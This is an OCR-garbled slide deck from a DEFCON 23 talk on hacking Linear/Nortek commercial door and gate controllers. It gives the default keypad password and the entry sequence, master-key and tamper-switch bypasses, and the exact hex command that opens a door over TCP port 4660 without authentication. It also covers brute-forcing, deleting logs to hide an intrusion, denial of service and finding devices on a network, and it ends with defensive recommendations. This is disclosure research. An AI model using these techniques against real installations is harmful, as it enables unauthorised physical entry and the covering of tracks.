Are We Really Sate? 


HACKING TEESE ONTROL SYSTEMS 


Dennis Maldonado 


> Security Consultant @ KLC Consulting 


» Twitter: @DennisMald 


» Houston Locksport Co-founder 
http://www.meetup.com/Houston-Locksport/ 


» Rebooting HAHA! (Houston Area Hackers Anonymous) 


Agenda 


» Physical Access Control System 
» Linear Commercial Access Control Systems 
» Attacks 

» Local 


» Remote 
> Demo/Tools 
» Device Enumeration Techniques 


» Recommendations 


Physical Access Control Systems 


Physical Access Control 


What do they do® 
Limiting access to physical location/resource 


» Secure areas using: 
» Doors 
» Gates 
» Elevators floors 


» Barrier Arms 


Bi | 


E 


| 


E 


Physical Access Control 
How do they work? 


p Access control systems 
» Keypad Entry (Entry/Directory codes) 
Telephone entry 
Radio receivers for remotes 
Proximity cards (RFID) 


Swipe cards 
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Sensors 


Where are they used? 


» Use cases: 
> Gated Communities 
Parking Garages 
Office Buildings 


Apartments 


Commercial Buildings 


» 

» 

» 

» Hotels/Motels 
» 

» Recreational Facilities 
» 


Medical Facilities 


Doorking 


Chamberlain 
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LiftMaster 


Nortek Security & Control/Linear Controllers 


Linear Access 


3 FAILED ATTEMPTS 
SYSTEM WILL LOCK 
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IN CASE OF FIRE 
USE NEAREST EXIT 
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Linear Commercial Access Control 


Nortek Security & Control/Linear Controllers 


Linear Access 


AM3Plus 


AE1000Plus 


AE2000Plus 


Linear Controller 


» Commercial Telephone Entry 
System 


» Utilizes a telephone line 
» Supports thousands of users 
» Networked with other controllers 


» Canbe configured/controlled 
through a PC 


» Serial Connection 
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Linear — TCP/IP Кї 


Е š re Convenient and cost effective 
> AM-SEK Kit (Serial-to-TCP) Model: AM-SEK Order 4: ACP00964 


» Converts Serial to Ethernet 


AM-SEK Kit Includes: 
» Allows Management over TCP/IP Р хш 
nelwork і > Software CD 
и Ethernet с ‚ & Quick Start 
» Allows for remote management / - 4 -— 


(over the internet) 


Power Adapter 


Serial Cable 


LIN-501C 
Serial-to-Ethernet 
Module 


Linear — Typical Installation 


Router/Switch 
192.168.0.0/24 


ESSERE: LL, 
Ethernet 
Ethernet 
ЕЕ. Cable 
| ———— ` 
oO 
Serial-to-TCP Management PC 
192.168.0.32:4660 192.168.0.40 


AE1000Plus 
Controller 


LOCAL AREA NETWORK 
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NTERFACE BEN INSTALLATION SITE TELEPHONE ENTRY 
DEVICE = = 222: OR ACCESS CONTROL 
SYSTEM 
10/100 BASE-T 
ETHERNET 


TO UP TO 7 MORE 
PLUS PANELS ON AN 
LIN-501C AB2000 NETWORK 
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AXNET NETWORK 
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TYPICAL INSTALLATION WITH THE LIN-501C MODULE FUNCTIONING AS THE 
INTERFACE BETWEEN THE PLUS PANEL AND THE INSTALLATION'S LOCAL AREA NETWORK 
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Software - AccessBase2000 


Add/remove users 
» Entry codes 
» Directory codes 
» Cards 
» Transmitters 
Manually toggle relays 
View log reports 
Communicates through serial 


Requires a password to 
authenticate 


Displays this toolbar information screen. 


dual cardholders and older 


cede s can be мам, 
and/or declared lost. 


Allows realtime monitoring and control of the 
installation. Monitors door status, manually. 
opens and cle doors and allows viewing of 
alarms. 


isplaying є 
ventlogs and cr 
the database. 


Connects the AccessBase 2000 program to the 
installation. 


backup copy of the installation database and for 
ing the installation database fram a 


Sets and synchronizes the installation time and 
date to the h computer's time and date. 


feature. 


Collects all event logs from the installation 
contra You must be online to use this 
functio 


Generates and sends data to the i 

When the button is not grayed out, new data 
needs to be sentto the i ion ivating 
this fu n wh i e queue with data 
to Бе sentto the installation. 
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Details >> | 


t ПАТ My Network 


Disconnect after programming 


Help, press Fl 
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Name for the network: Password: 


Edit the settings for this network 


№ Enable Network Cancel 


My Network i i 23456 


How to program the time for this netris 


Enable daylight savings Iv Hours offset from РС clock: 0 = 


How to connect to network 


5 R Fhone number 
Connect using: 


COM3 = [7 


Country code: 


United States [1] 


Phone number: 
| ] 


Anti-PassBack Devices: 


Mame Туре 


| Direction 
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File View Setup Help 


Research - Сагаполае 
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Cardholders: 

2-29] All Access [2] 


Dennis 


Ê Bob Billy 
29] No Access 
E- New Cardholder set [1] 
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Not Connected 


Net: ПА) My Networl H 


м Disconnect after programming 


Cardholders for All Access 


First Name: Middle: Last Name: 
Billy Е [Bob 
Street: 

123 Fake St 

City: State: Zip Code: 
Home Phone: Work Phone: 


Expiration (12:00 a.m.) 
м Never expires 


Credentials 
Transmitters 


9 З Transmitters Assign transmitter Transmitters assigned 
Cards 
| zl 


Surrender transmitter 


Entry Codes 


Directory Codes Surrender 


ELLEN 
Apply 


Reset 
Anti-passback 
Status 


Transmitter Status 
| Suspended 
| Lost 


Assign New 
Individual 
Transmitter 


PC to Controller Communication 


» Request 
> 5AA5000A1105010008000000CB97 


5AA5000A11013635343332319A71 


» Response 


p Acknowledged: 
5AA50004110C4625 


5AA50005110D024C23 


» Not Acknowledged: 
5АА5О ДИВНІ ОРО2 4 С2 З 


p Invalid Checksum: 
5AA50005110D017EB8 


p No response (not authenticated) 


String is Hex Encoded 


Minimum Net 
Data Length Node 
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Packet Maximum Command Data Checksum 
Header Bejlellength m _ (Нех) 


Poll Status = 02 


Attacks 


LOCAL AND REMOTE ATTACKS 


So how ао we target these 
controllers? 


» Physical Access 
» Local Programming 


» Serial port inside the controller 
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ENTER 


FUNCTION: 
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Local Attacks 


АЕ-500 — Default Password 


» Hold 0 and 2 on the keypad 


> Туре the default password: ENTER CODE? 009 
123456# 


» Input the commands to add o 
new entry code 


> 31#9999#9999#99# 
» Type in your new code (9999) 
p Access Granted! 


Confirm 


помсти 7" 


Enter New Entry Code Exit 
Programming Programming 
Mode Mode 
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OPERATING INSTRUCTIONS: 


+ PRESS AND RELEASE (ES) To VIEW THE DIRECTORY 


2 ноо БФ) TO SCROLL FORWARD 


з HOLD [X] TO SCROLL BACKWARO 
4 LOCATE THE DESIRED NAME IN THE DIRECTORY 


5. ENTER THE DIRECTORY CODE TO CALL RESIDENT 


IF NO ANSWER, PRESS Í] TO HANG UP 


Master Key 


» Same key for all AE1000plus, 
AM3plus controllers 


p Purchase them from a supplier or 
on eBay 


» Orjust pick the lock 


Full access to the device 


Physical Access 


» Manual Relay Latch buttons 
» Toggle Relay 


» Locktheir state 


PROCESSOR 
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> Manual Relay Lotch buttons 
» Toggle Relay 


does 
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» Lock their state 
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» Programming buttons 


» Program device locally 
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Active Phone Line 
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p Serial connection to The controller 


Tamper Monitoring? 


» Magnetic tamper switch inside 
enclosure 


» Мо active alerts 


> Can be bypassed by placing а 
magnet on the outside of the 
enclosure 


So how ао we target these 
controllers? 


» Physical Access 
» Local Programming 


» Serial port inside the controller 


ЕТТТ 


ENTER 


FUNCTION: 
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So how do we target these 


controllerse 


» Physical Access 

» Local Programming 

» Serial port inside the controller 
» Internal Network Access 

p IP of Serial to TCP device 

> TCP Port 4660 
» External Network Access 

» IP of Serial to ТСР device 


p TCP Port 4660 open to the internet 
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SUPPLY 


TYPICAL INSTALLATION WITH THE LIN-501C MODULE FUNCTIONING AS THE 
INTERFACE BETWEEN THE PLUS PANEL AND THE INSTALLATION'S LOCAL AREA NETWORK 
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192.168.0.32:4660 
74.12.х.х:4660 


Remote Attacks 


Demo 


Brute-force attack 


> Мо rate limiting Guess: 123456 
Guess: 654321 

» Мо password lockout Cuess: 654391 
Guess: 654321 

» Small key space Guess: 980000 
Guess: 000000 

» Exactly 6 characters Guess: 111111 
Guess: 111111 

» Numeric only Guess: 111111 
Guess: 222222 

і Guess: 222222 

4 scriptable Guess: 444444 
Guess: 444444 

Guess: 444444 

Guess: 555555 

Guess: 555555 

Guess: 666666 


Demo 


No Password Necessary 


Authentication not enforced! 
Send unauthenticated commands 


Any commands will execute 
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May not get any confirmation 
data 


Hacker 
Raw Connection 


AE1000Plus 
Controller 


Open Doors Remotely 


» Send one simple command 


p 5AA5000A1105010000080000E88D 


> Triggers a relay for 2 seconds thus 
opening a door or gate 


» Great for movie style scenes 


І 2445000A41105010000080000E88D 


Hacker 
Raw Connection 


AE1000Plus 
Controller 


Lock Doors Open/Closed 


» Keeps Doors/Gates open = al 
or closed 


» Wil not respond То user 
input (RFID cards, remotes, 
etc) 


РА 


> Persist until manually 
unlocked or rebooted 


Delete Logs Нот The Controller 


Controller keeps logs of events 


Downloading logs deletes them 
from the controller 


Hide evidence of entry or 
tampering 


07/25/15 - 02:24:08 
07/25/15 - 02:24:04 

07/24/15 - 23:34:4 
07/24/15 - 23:25:22 
07/24/15 - 18:49:16 
07/24/15 - 18:41:04 
07/24/15 - 18:40:04 
07/24/15 - 17:27:28 
07/24/15 - 17:27:24 
07/24/15 - 17:26:44 
17/24/15 - 17:26:40 
07/24/15 - 17:25:20 
07/24/15 - 17:25:20 
07/24/15 - 17:23:44 
07/24/15 - 17:23:40 
07/24/15 - 17:23:40 
07/24/15 - 17:23:36 
07/24/15 - 17:23:36 
07/24/15 - 17:23:32 
07/24/15 - 17:23:32 
15 - 17:23:28 


4/15 - 17 0 
/24/15 - 17:22:04 
/24/15 - 17:19:56 

/15 - 17:19:52 
/24/15 - 17:19:48 
/24/15 - 17:19:48 
/24/15 - 17:19:44 


/24/15 - 17:19:08 


[A1B] Door 2 
[A1A] Door 1 


[A] My Netw... 
[A] My Netw... 


[A1A] Door 1 
[A1D] Door 4 
[A1A] Door 1 
[A1B] Door 2 
[A1A] Door 1 
[A1B] Door 2 
[A1A] Door 1 
[A1B] Door 2 
[A1A] Door 1 


[A1A] Door 1 
[A1A] Door 1 
[A1A] Door 1 
[A1] 
[A1] 
[A1] 
[A1A] Door 1 
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Dennis 


Dennis 
Request to e... 
Dennis 
Dennis 
Dennis 
Dennis 
Dennis 
Dennis 
Dennis 


Panel operat... 
Dennis 
Dennis 
Dennis 


Panel operat... 


Dennis 


| Date & Time [Door |Modifier [Event | 


Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Network connection error 

Network connection error 

Single xmtr [46150], Access granted 
Open request 

Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Tamper switch closed 

Tamper switch open 

Tamper switch closed 

Tamper switch open 

Tamper switch closed 

Tamper switch open 

Tamper switch closed 

Tamper switch open 

Reset/Power Up 

Tamper switch open 

Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Single xmtr [46150], Access granted 
Tamper switch open 

Reset/Power Up 

Tamper switch open 

Single xmtr [46150], Access granted 


Change the Password 


Upload configuration settings 


Change password without 
needing the previous password 


Normal functionality remains 


Upload other configuration 
changes 


< = em a $ PRIORITY 
Bl ~ ІТ - E ” Oz O ACCESS 


Names | Relays | Modem Passwords | Remote Device | Dbstacle Transmitters | Elevator Control | General | 


Passwords 


Remote Access: |123456 
Priority Access: [23456 


Apply Cancel 


Not Connected 
Net: ПА) My Network 


[ Disconnect after programming 


Denial of Service 


» Fake database update will disable 
controller connected to or 
rebooted 


> Overwrite device firmware 


» Lockrelays to prevent access 


АСАТ - Access Control Attack Tool 
Demo 


Locating Controllers 


Device Enumeration Techniques 


p Scan the network 
> Look for any COM port redirectors 
p Default port = TCP 4660 

p Send broadcast packet То UDP 55954 
p Devices will respond 


» Send a password request string to port 
4660 


> 5AA5000A11013635543332519A71 


> 5AA50004110C4625 


> 5AA50005110D024C23 


Starting Мтар 
Time 
Nmap scan керо 
Host is up CB. 
Not shown: 655 
PORT STAT 
23/tcp open 
BB/tcp open 
1111/tcp open 
4666/tcp open 
4676/tcp open 
55952/tcp open 
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6 .49BETA4 < https://nmap.org > at 2015-07-31 69:56 


rt for 10.0.0.12 

99145 latency? . 

29 closed ports 

E SERUICE VERSION 
telnet 
http Web Server 1.1 
tcpurapped 
telnet Aaxeon DevoLinx COM port redirector 
tcpwrapped 
tcpwrapped 


Broadcast 
Response 


à Client 


ЕЕ 


Demo 


Recommendations 


Always change the default password 
Change physical locks 
Use a direct serial connection 


If networked, utilize authentication 
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Resist opening the controller to the 
internet 


Final Thoughts 


Other vendors 
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Ongoing research 
» Tool- More work is needed 


> Tool located on https://github.com/linuz/Access-Control-Attack-Tool 
» It's currently just a prototype 


» Continue updating it/take it out of "PoC mode" 
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Working on an Nmap script 
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Slides uploaded to SlideShare 
www.slideshare.net/DennisMaldonado5 


Questions? 


> If you have any questions, you can: 
» Twitter: @DennisMald 


» Find me here at DEFCON23 


> Email me at: dmaldonado@klcconsulting.net 


